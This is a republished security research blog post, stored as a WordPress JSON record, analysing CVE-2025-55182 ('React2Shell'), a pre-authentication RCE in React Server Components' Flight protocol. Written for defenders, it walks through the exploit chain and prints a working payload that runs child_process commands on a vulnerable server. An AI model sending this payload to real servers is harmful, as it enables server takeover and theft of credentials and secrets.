{"id":59824,"date":"2025-12-10T00:00:00","date_gmt":"2025-12-10T00:00:00","guid":{"rendered":"urn:uuid:c96b74f4-45d2-b27c-4fc2-70d60688ee2a"},"modified":"2025-12-10T00:00:00","modified_gmt":"2025-12-10T00:00:00","slug":"cve-2025-55182-react2shell-analysis-proof-of-concept-chaos-and-in-the-wild-exploitation","status":"publish","type":"post","link":"https:\/\/www.threatshub.org\/blog\/cve-2025-55182-react2shell-analysis-proof-of-concept-chaos-and-in-the-wild-exploitation\/","title":{"rendered":"CVE-2025-55182: React2Shell Analysis, Proof-of-Concept Chaos, and In-the-Wild Exploitation"},"content":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/CVE-2025-55182-thumb:Large?qlt=80\"><\/p>\n<div><img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/thumbnails\/25\/CVE-2025-55182-thumb.jpg\" class=\"ff-og-image-inserted\"><\/div>\n<p><b>Key takeaways:<\/b><\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">The exploit leverages JavaScript\u2019s duck-typing and dynamic code execution through an attack that has four stages: it creates a self-reference loop, tricks JavaScript into calling attacker code, then injects malicious data for initialization, and finally executes arbitrary code via Blob Handler.<\/span><\/li>\n<li><span class=\"rte-red-bullet\">We\u2019ve identified nearly 145 in-the-wild proof-of-concept exploits of various quality with features such as WAF bypasses and automated mass-scanning.<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Trend\u2122 Research observed that CVE-2025-55182, as of this writing, is being exploited in-the-wild, and in several malware campaigns such as the emerald and nuts campaigns. 
Several of these are attacks that execute Cobalt Strike beacons generated with Cross C2, deploy Nezha, Fast Reverse Proxy (FRP), the Sliver payload, and the Secret-Hunter payload.&nbsp;<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Trend Research provides patch and PoC landscape analysis and clarifies misconceptions about the React2Shell vulnerability to minimize chances of the deployment of ineffective defenses as well as fear, uncertainty, and doubt regarding CVE-2025-55182. Organizations should expect targeted scanning from bug bounty hunters against publicly accessible infrastructure including websites.&nbsp;<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Trend Vision One\u2122 detects and blocks the IoCs discussed in this blog. Trend Micro customers can also access tailored hunting queries, threat insights, and intelligence reports to better understand and proactively defend against attackers exploiting CVE-2025-55182.<\/span><\/li>\n<\/ul>\n<p><i>Trend customers can visit the\u202f <a href=\"https:\/\/success.trendmicro.com\/en-US\/solution\/KA-0021831\">knowledge base entry<\/a>&nbsp;for information on available solutions and how to mitigate this vulnerability.<\/i><\/p>\n<p>We have previously published a <a href=\"https:\/\/www.trendmicro.com\/en_us\/research\/25\/l\/critical-react-server-components-vulnerability.html\">blog<\/a> on what organizations need to know about the actively exploited CVE-2025-55182, which is a critical (CVSS 10.0) pre-authentication remote code execution vulnerability affecting React Server Components (RSC) used in React.js, Next.js, and related frameworks.<\/p>\n<p>RSC is a modern architecture where UI components run on the server instead of the browser, reducing JavaScript sent to clients.&nbsp;<\/p>\n<p>RSC communicate between client and server using a serialization protocol called \u201c<a href=\"https:\/\/gitnation.com\/contents\/meet-react-flight-and-become-a-rsc-expert\">React Flight.<\/a>\u201d This protocol enables 
streaming of complex data structures that mirror the React component tree, allowing UIs to render progressively while awaiting backend responses. The sum of this streamed data can be called the RSC payload. Think of it as an RPC-over-HTTP mechanism where clients send \u201cchunks\u201d of serialized data to Server Functions.<\/p>\n<p>When a user submits a form on an RSC app, the browser packages form data into numbered \u201cchunks\u201d that reference each other. The server then reassembles these chunks to understand what the user requested.<\/p>\n<p><span class=\"blockquote\"># Example: User profile update sent as Flight chunks<br \/>form_data = {<br \/>&nbsp;&nbsp;&nbsp; &quot;0&quot;: (None, '[&quot;$1&quot;]'),&nbsp; # Entry point \u2192 load chunk 1<br \/>&nbsp;&nbsp;&nbsp; &quot;1&quot;: (None, '{&quot;action&quot;:&quot;updateProfile&quot;,&quot;user&quot;:&quot;$2&quot;}'),&nbsp; # Action \u2192 load user from chunk 2<br \/>&nbsp;&nbsp;&nbsp; &quot;2&quot;: (None, '{&quot;userId&quot;:42,&quot;email&quot;:&quot;user@example.com&quot;}'),&nbsp; # Actual user data<br \/>}<br \/># Server processes: chunk 0 \u2192 chunk 1 \u2192 chunk 2, assembling the complete request<\/span><\/p>\n<p>Flight uses special <i>$X<\/i> prefixes to encode different data types. This is where the vulnerability lies: it affects how the server deserializes data from clients. 
An attacker can send malicious data that executes arbitrary code on your servers before any authentication occurs.<\/p>\n<table cellpadding=\"1\" cellspacing=\"0\" border=\"1\" width=\"100%\">\n<tbody readability=\"5\">\n<tr>\n<td><b>Prefix<\/b><\/td>\n<td><b>Purpose<\/b><\/td>\n<td><b>Risk<\/b><\/td>\n<\/tr>\n<tr readability=\"4\">\n<td>$@<\/td>\n<td>Raw chunk reference (returns chunk object itself)<\/td>\n<td>Exploited &#8211; allows access to internal React objects<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td>$B<\/td>\n<td>Blob\/binary data<\/td>\n<td>Exploited &#8211; provides code execution gadget<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td>$F<\/td>\n<td>Function reference<\/td>\n<td>Normal server action calls<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td>$L<\/td>\n<td>Lazy component<\/td>\n<td>Deferred component loading<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><span class=\"rte-legal-text\">Table 1.&nbsp; Flight protocol prefixes and security risks<\/span><\/p>\n<p>When RSC receives data from a client, it needs to check \u201cdoes this object actually have this property, or is it inherited from JavaScript\u2019s built-in prototypes?\u201d The vulnerable code checked this by asking the untrusted object itself: much like asking a burglar if they\u2019re supposed to be in your house.&nbsp;<\/p>\n<p>The vulnerability resides in React\u2019s reviveModel function within <i><a href=\"https:\/\/github.com\/facebook\/react\/blob\/6875c3eab48179f3c74a8a9f825c09554f683d7d\/packages\/react-server\/src\/ReactFlightReplyServer.js#L929-L933\">ReactFlightReplyServer.js<\/a>. <\/i>When traversing chunks during reference resolution, React failed to verify whether a requested key was an own property of the object versus an inherited prototype property. 
The vulnerable code path is illustrated below:<\/p>\n<p><span class=\"blockquote\">for (i in value)&nbsp;<br \/>&nbsp;&nbsp;&nbsp; value.hasOwnProperty(i) &amp;&amp;&nbsp;<\/span><\/p>\n<p>In JavaScript, every object inherits from Object.prototype, which includes methods like <i>hasOwnProperty<\/i>, <i>constructor<\/i>, and <i>toString<\/i>. Normally these are safe, but an attacker who controls value can replace hasOwnProperty with something malicious, bypassing the security check entirely.<\/p>\n<p>The critical flaw is the call to <i>value.hasOwnProperty(i)<\/i>, which performs a method lookup on the untrusted value object. An attacker-controlled payload can shadow this property with a malicious reference, bypassing the ownership check entirely. This opened access to prototype chain properties like constructor and <i>__proto__<\/i>.<\/p>\n<p>This exploit worked like a series of locks being picked: each stage of the exploit chain got the attacker one step closer to code execution. In the next section we explain each lock and how it was picked.<\/p>\n<p><span class=\"body-subhead-title\">React2Shell exploitation chain<\/span><\/p>\n<p>The exploit leverages JavaScript\u2019s duck-typing and dynamic code execution through an attack with four stages. This chain has been documented in two separate GitHub posts from other researchers that can be accessed <a href=\"https:\/\/github.com\/msanft\/CVE-2025-55182\">here<\/a> and <a href=\"https:\/\/gist.github.com\/maple3142\/48bc9393f45e068cf8c90ab865c0f5f3\">here<\/a>.&nbsp;<\/p>\n<p><b>Stage 1: Create a self-reference loop<\/b><\/p>\n<p>To get access to JavaScript\u2019s internal objects, the attacker makes chunks reference themselves: the <i>$@<\/i> prefix returns the raw chunk object instead of its parsed value. 
If chunk 1 says \u201c<i>give me chunk 0\u2019s raw object<\/i>\u201d <i>($@0)<\/i>, and <i>chunk 0<\/i> references <i>chunk 1<\/i>, you create a loop.<\/p>\n<p><span class=\"blockquote\">attack_payload = {<br \/>&nbsp;&nbsp;&nbsp; &quot;0&quot;: '{&quot;callback&quot;: &quot;$1:__proto__:then&quot;}',&nbsp; # Chunk 0 reaches into chunk 1's prototype<br \/>&nbsp;&nbsp;&nbsp; &quot;1&quot;: '&quot;$@0&quot;',<br \/>}<\/span><\/p>\n<p>By traversing <i>$1:__proto__:constructor:constructor<\/i>, the attacker walks up JavaScript\u2019s prototype chain: chunk 1 \u2192 <i>Object.prototype<\/i> \u2192 Object constructor \u2192 <i>Function<\/i> constructor. Now they can create arbitrary functions.<\/p>\n<p><b>Stage 2: Trick JavaScript into calling attacker code<\/b><\/p>\n<p>To make JavaScript automatically execute attacker-controlled code, the attacker relies on JavaScript\u2019s await keyword, which looks for objects with a <i>.then()<\/i> method and calls it automatically. By setting then to point to React\u2019s internal Chunk.prototype.then, the attacker hijacks this mechanism:<\/p>\n<p><span class=\"blockquote\">Chunk.prototype.then = function(resolve, reject) {<br \/>&nbsp;&nbsp;&nbsp; if (this.status === &quot;resolved_model&quot;) {<br \/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; initializeModelChunk(this);<br \/>&nbsp;&nbsp;&nbsp; }<br \/>};<\/span><\/p>\n<p>When React processes the malicious chunk, it sees a then property and treats it like a Promise. React\u2019s own code then calls <i>initializeModelChunk()<\/i>, which is the next stage.<\/p>\n<p><b>Stage 3: Inject malicious data for initialization<\/b><\/p>\n<p>To feed the attacker\u2019s payload into React\u2019s code initialization process, the status is set to &#8220;<i>resolved_model<\/i>&#8221;, which makes React parse the .value field and process it. 
The attacker puts their payload here:<\/p>\n<p><span class=\"blockquote\">function initializeModelChunk(chunk) {<br \/>&nbsp;&nbsp;&nbsp; var rawModel = JSON.parse(chunk.value);<br \/>}<\/span><\/p>\n<p>React trusts the status field. If it says \u201c<i>resolved_model<\/i>\u201d, React assumes the chunk is ready and parses its contents, including malicious references.<\/p>\n<p><b>Stage 4: Execute arbitrary code via the blob handler<\/b><\/p>\n<p>To convert a reference lookup into actual code execution, the attacker uses the <i>$B<\/i> prefix, which triggers React\u2019s blob handler; the handler calls a <i>.get()<\/i> method on a controlled object. The attacker points <i>_formData.get<\/i> at the Function constructor, which the handler then calls:<\/p>\n<p><span class=\"blockquote\">case &quot;B&quot;:<br \/>&nbsp;&nbsp;&nbsp; return response._formData.get(response._prefix + obj);<\/span><\/p>\n<p>The attacker crafts their payload so the call becomes:<\/p>\n<p><span class=\"blockquote\">Function(&quot;require('child_process').execSync('id');\/\/0&quot;)()<\/span><\/p>\n<p>React appends a chunk ID to the string. The \/\/ starts a JavaScript comment, so that extra data is ignored. 
The server then executes the attacker\u2019s shell command (<i>id<\/i>, or <i>wget<\/i>, or <i>anything<\/i>) with full <i>Node.js<\/i> privileges.<\/p>\n<p><span class=\"body-subhead-title\">Minimum viable exploit<\/span><\/p>\n<p>This section demonstrates that exploitation doesn\u2019t require complex setup: just a single HTTP request.<\/p>\n<p>The complete payload requires no <i>__proto__<\/i> access (contrary to many circulating proof-of-concept exploits that use it):<\/p>\n<p><span class=\"blockquote\">{<br \/>&nbsp; 0: {<br \/>&nbsp;&nbsp;&nbsp; status: &quot;resolved_model&quot;,<br \/>&nbsp;&nbsp;&nbsp; reason: -1,<br \/>&nbsp;&nbsp;&nbsp; _response: {<br \/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; _prefix: &quot;console.log('RCE')\/\/&quot;,<br \/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; _formData: { get: &quot;$1:then:constructor&quot; },<br \/>&nbsp;&nbsp;&nbsp; },<br \/>&nbsp;&nbsp;&nbsp; then: &quot;$1:then&quot;,<br \/>&nbsp;&nbsp;&nbsp; value: '{&quot;then&quot;:&quot;$B&quot;}',<br \/>&nbsp; },<br \/>&nbsp; 1: &quot;$@0&quot;,<br \/>}<\/span><\/p>\n<table cellpadding=\"1\" cellspacing=\"0\" border=\"1\" width=\"100%\">\n<tbody readability=\"8\">\n<tr readability=\"2\">\n<td><b>Field<\/b><\/td>\n<td><b>Purpose<\/b><\/td>\n<td><b>Junior-Friendly Explanation<\/b><\/td>\n<\/tr>\n<tr readability=\"2\">\n<td>status: &#8220;resolved_model&#8221;<\/td>\n<td>Trigger initialization<\/td>\n<td>\u201cI\u2019m ready to be processed\u201d<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td>reason: -1<\/td>\n<td>Prevent 
crash<\/td>\n<td>Technical workaround to avoid toString() error<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td>_prefix<\/td>\n<td>Malicious code<\/td>\n<td>The actual command that runs on the server<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td>_formData.get<\/td>\n<td>Code execution gadget<\/td>\n<td>Points to Function() so we can create new functions<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td>then<\/td>\n<td>Automatic trigger<\/td>\n<td>Makes JavaScript call our code via await<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td>value<\/td>\n<td>Attack payload<\/td>\n<td>Contains $B which triggers the blob handler<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td>1: &#8220;$@0&#8221;<\/td>\n<td>Self-reference<\/td>\n<td>Creates the loop that exposes internal objects<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><span class=\"rte-legal-text\">Table 2. Breakdown of the malicious payload components<\/span><\/p>\n<p>The <i>$1:then:constructor<\/i> path explained:<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">$1 \u2192 Go to chunk 1 (which references chunk 0)<\/span><\/li>\n<li><span class=\"rte-red-bullet\">:then \u2192 Access the then property (a function)<\/span><\/li>\n<li><span class=\"rte-red-bullet\">:constructor \u2192 Get that function\u2019s constructor \u2192 Function<\/span><\/li>\n<\/ul>\n<p>Since then is a function, its .constructor is Function itself: the built-in JavaScript constructor that can create and execute arbitrary code.<\/p>\n<p><b>Pre-authentication attack surface<\/b><\/p>\n<p>This vulnerability is particularly severe because exploitation occurs during deserialization, before the requested Server Action is validated. Setting any Next-Action header value (even <i>Next-Action: foo<\/i>) triggers the vulnerable code path. 
Per <a href=\"https:\/\/www.facebook.com\/security\/advisories\/cve-2025-55182\">Facebook\u2019s Security Advisory<\/a>:<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">Pre-authentication RCE: No credentials required<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Node.js context execution: Full access to process, child_process, filesystem<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Environment variable access: Database credentials, API keys, secrets<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Lateral movement: Cloud metadata endpoints, internal network access<\/span><\/li>\n<\/ul>\n<p><span class=\"body-subhead-title\">In-the-wild activity<\/span><\/p>\n<p>This section documents real attacks we\u2019ve observed. Enterprises can use the IOC table to update their respective threat feeds, and the timeline to assess if their organization was exposed during the exploitation window.<\/p>\n<p> Read More <a href=\"https:\/\/www.trendmicro.com\/en_us\/research\/25\/l\/CVE-2025-55182-analysis-poc-itw.html\">HERE<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>CVE-2025-55182 is a CVSS 10.0 pre-authentication RCE affecting React Server Components. Amid the flood of fake Proof-of-concept exploits, scanners, exploits, and widespread misconceptions, this technical analysis intends to cut through the noise. 
Read More HERE&#8230;<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"colormag_page_layout":"default_layout","footnotes":""},"categories":[61],"tags":[9510,9555,9534,9509],"class_list":["post-59824","post","type-post","status-publish","format-standard","hentry","category-trendmicro","tag-trend-micro-research-articles-news-reports","tag-trend-micro-research-exploitsvulnerabilities","tag-trend-micro-research-latest-news","tag-trend-micro-research-research"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.6 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>CVE-2025-55182: React2Shell Analysis, Proof-of-Concept Chaos, and In-the-Wild Exploitation 2026 | ThreatsHub Cybersecurity News<\/title>\n<meta name=\"description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.threatshub.org\/blog\/cve-2025-55182-react2shell-analysis-proof-of-concept-chaos-and-in-the-wild-exploitation\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"CVE-2025-55182: React2Shell Analysis, Proof-of-Concept Chaos, and In-the-Wild Exploitation 2026 | ThreatsHub Cybersecurity News\" \/>\n<meta property=\"og:description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 
100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.threatshub.org\/blog\/cve-2025-55182-react2shell-analysis-proof-of-concept-chaos-and-in-the-wild-exploitation\/\" \/>\n<meta property=\"og:site_name\" content=\"ThreatsHub Cybersecurity News\" \/>\n<meta property=\"article:published_time\" content=\"2025-12-10T00:00:00+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/CVE-2025-55182-thumb:Large?qlt=80\" \/>\n<meta name=\"author\" content=\"TH Author\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@threatshub\" \/>\n<meta name=\"twitter:site\" content=\"@threatshub\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"TH Author\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"8 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/cve-2025-55182-react2shell-analysis-proof-of-concept-chaos-and-in-the-wild-exploitation\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/cve-2025-55182-react2shell-analysis-proof-of-concept-chaos-and-in-the-wild-exploitation\\\/\"},\"author\":{\"name\":\"TH Author\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\"},\"headline\":\"CVE-2025-55182: React2Shell Analysis, Proof-of-Concept Chaos, and In-the-Wild 
Exploitation\",\"datePublished\":\"2025-12-10T00:00:00+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/cve-2025-55182-react2shell-analysis-proof-of-concept-chaos-and-in-the-wild-exploitation\\\/\"},\"wordCount\":1638,\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/cve-2025-55182-react2shell-analysis-proof-of-concept-chaos-and-in-the-wild-exploitation\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/trendmicro.scene7.com\\\/is\\\/image\\\/trendmicro\\\/CVE-2025-55182-thumb:Large?qlt=80\",\"keywords\":[\"Trend Micro Research : Articles, News, Reports\",\"Trend Micro Research : Exploits&amp;Vulnerabilities\",\"Trend Micro Research : Latest News\",\"Trend Micro Research : Research\"],\"articleSection\":[\"TrendMicro\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/cve-2025-55182-react2shell-analysis-proof-of-concept-chaos-and-in-the-wild-exploitation\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/cve-2025-55182-react2shell-analysis-proof-of-concept-chaos-and-in-the-wild-exploitation\\\/\",\"name\":\"CVE-2025-55182: React2Shell Analysis, Proof-of-Concept Chaos, and In-the-Wild Exploitation 2026 | ThreatsHub Cybersecurity News\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/cve-2025-55182-react2shell-analysis-proof-of-concept-chaos-and-in-the-wild-exploitation\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/cve-2025-55182-react2shell-analysis-proof-of-concept-chaos-and-in-the-wild-exploitation\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/trendmicro.scene7.com\\\/is\\\/image\\\/trendmicro\\\/CVE-2025-55182-thumb:Large?qlt=80\",\"datePublished\":\"2025-12-10T00:00:00+00:00\",\"description\":\"ThreatsHub 
Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/cve-2025-55182-react2shell-analysis-proof-of-concept-chaos-and-in-the-wild-exploitation\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/cve-2025-55182-react2shell-analysis-proof-of-concept-chaos-and-in-the-wild-exploitation\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/cve-2025-55182-react2shell-analysis-proof-of-concept-chaos-and-in-the-wild-exploitation\\\/#primaryimage\",\"url\":\"https:\\\/\\\/trendmicro.scene7.com\\\/is\\\/image\\\/trendmicro\\\/CVE-2025-55182-thumb:Large?qlt=80\",\"contentUrl\":\"https:\\\/\\\/trendmicro.scene7.com\\\/is\\\/image\\\/trendmicro\\\/CVE-2025-55182-thumb:Large?qlt=80\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/cve-2025-55182-react2shell-analysis-proof-of-concept-chaos-and-in-the-wild-exploitation\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Trend Micro Research : Articles, News, Reports\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/tag\\\/trend-micro-research-articles-news-reports\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"CVE-2025-55182: React2Shell Analysis, Proof-of-Concept Chaos, and In-the-Wild Exploitation\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"name\":\"ThreatsHub Cybersecurity News\",\"description\":\"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - 
Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"alternateName\":\"Threatshub.org\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\",\"name\":\"ThreatsHub.org\",\"alternateName\":\"Threatshub.org\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"contentUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"width\":432,\"height\":435,\"caption\":\"ThreatsHub.org\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/x.com\\\/threatshub\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\",\"name\":\"TH 
Author\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"caption\":\"TH Author\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","_links":{"self":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/59824","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/comments?post=59824"}],"version-history":[{"count":0,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/59824\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media?parent=59824"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/categories?post=59824"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/tags?post=59824"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}